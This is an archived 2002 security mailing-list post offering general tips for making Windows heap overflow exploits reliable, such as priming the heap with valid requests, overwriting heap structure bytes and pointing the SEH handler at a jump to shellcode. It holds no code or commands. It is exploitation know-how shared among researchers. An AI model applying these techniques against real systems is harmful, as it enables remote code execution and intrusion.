Hosting Provided By

Windows Heap Overflows In General

From: Brett Moore <brett(at)softwarecreations.co.nz>
Date: Sun Dec 01 2002 - 21:03:04 EST

Merry Christmas all, tis the month for knowledge sharing.

Some tips and tricks when working with windows heap based overflows to stimulate your mind.

*) The more the merrier - If it lets you stuff it in there, stuff it.
Different sizes, different characters can give different results.
*) Running the exploit Local vs Remote can sometimes matter.
*) The only state you can be sure of, is that your request is not the first.
But the only way to ensure this is by sending valid requests before the exploit. Numbers vary, find a minumum and it can help in the stability of overflows.
*) Remember with heap based overflows you can write multiple sets of 4
bytes. It's not the registers you are overflowing, but a structure. What do the other structure bytes control? Size does matter! http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0105.html * Wheres our code at? It's not just esp that holds important variable locations. Where do all those other numbers point?

The first 3 allow you to write code that 99-100% of the time hits the spot. The last two allow you to write any relative jump instruction you need and set the seh handler to your relative jump, thus 99-100% giving execution to your shellcode.

Heyas to all who know. Received on Mon Dec 2 03:10:01 2002

This message: [ Message body ]
Next message: Peter Gutmann: "Re: "download" caps"
Previous message: Philip Rowlands: "Re: VNC game"
Next in thread: David Litchfield: "Re: Windows Heap Overflows In General"
Reply: David Litchfield: "Re: Windows Heap Overflows In General"
Reply: Vizzy: "Re: Windows Heap Overflows In General"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:37 EDT